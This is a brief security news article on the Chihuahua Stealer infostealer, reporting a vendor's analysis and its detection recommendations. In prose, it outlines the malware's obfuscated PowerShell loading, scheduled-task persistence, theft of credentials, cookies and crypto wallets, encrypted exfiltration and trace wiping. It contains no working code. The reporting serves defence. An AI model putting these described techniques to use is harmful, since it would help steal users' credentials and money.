A new strain of infostealer has recently been identified, blending standard malware techniques with unusually advanced features. Known as Chihuahua Stealer, this .NET infostealer was first discovered by a Reddit user in April 2025 and later analyzed by G Data CyberDefense, who shared their findings in a report on May 13.
Despite its seemingly unsophisticated appearance, Chihuahua Stealer utilizes advanced methods including stealthy loading, scheduled task persistence, and a multi-staged payload. The malware employs a complex, multi-stage PowerShell script infection process triggered by an obfuscated PowerShell script found in a Google Drive document. This script utilizes Base64 encoding, hex-string obfuscation, and scheduled jobs to maintain persistence and retrieve additional payloads from command-and-control (C2) domains.
The multi-stage execution chain involves several steps, including a lightweight launcher executing a Base64-encoded PowerShell string, decoding and reconstructing a heavily obfuscated hex payload, establishing persistence by scheduling a job to contact C2 servers, and loading and executing the Chihuahua Stealer in-memory before cleaning up visible traces.
Once executed, the Chihuahua Stealer initiates its main logic by generating a unique identifier for the infected system based on the machine name and disk serial number. It then proceeds to extract data by searching for browser and crypto wallet files, extracting credentials, cookies, autofill data, browsing history, sessions, and payment information.
After gathering the stolen information, the malware encrypts and compresses it into a “.chihuahua” archive using AES-GCM encryption. The encrypted data is then exfiltrated to an external server using a retry loop before wiping all evidence of its activity from the disk.
To mitigate the threat posed by Chihuahua Stealer, G Data CyberDefense recommends alerting on frequent scheduled PowerShell jobs with suspicious commands, hunting for unusual file extensions or marker files in directories like Recent or Temp, detecting Base64 decoding combined with .NET reflection in PowerShell logs, and flagging uncommon AES-GCM usage tied to outbound HTTPS traffic.
By remaining vigilant and implementing these mitigation recommendations, organizations can better protect themselves against the sophisticated techniques employed by Chihuahua Stealer and similar advanced malware threats.